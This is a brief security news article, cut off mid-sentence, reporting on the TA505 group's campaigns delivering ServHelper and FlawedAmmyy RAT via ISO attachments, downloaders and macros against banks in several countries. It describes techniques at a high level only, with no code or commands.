TA505 APT Hackers Group Drop ServHelper and FlawedAmmyy
TA505 hacker group continues to evolve by making small changes with their techniques, target countries and combination of techniques for each their campaigns. The group’s active campaigns found in April, June & July, in all the campaigns they continue to use FlawedAmmyy RAT or ServHelper variants as payloads. According to TrendMicro report the group now targeting new countries such as Turkey, Serbia, Romania, Korea, Canada, the Czech Republic, and Hungary. TA505 Entry methods The new campaign targets banks in Turkish and Serbian contains an. ISO file as an attachment, this method is not new with TA505 hacker group. They use the following methods as an entry point, ISO image attachments .NET downloader New style for macro delivery Newer version of ServHelper .DLL variant of FlawedAmmyy downloader The attack starts with an Email that includes ISO image is an. LNK which then uses a msiexec Windows installer to install the file do...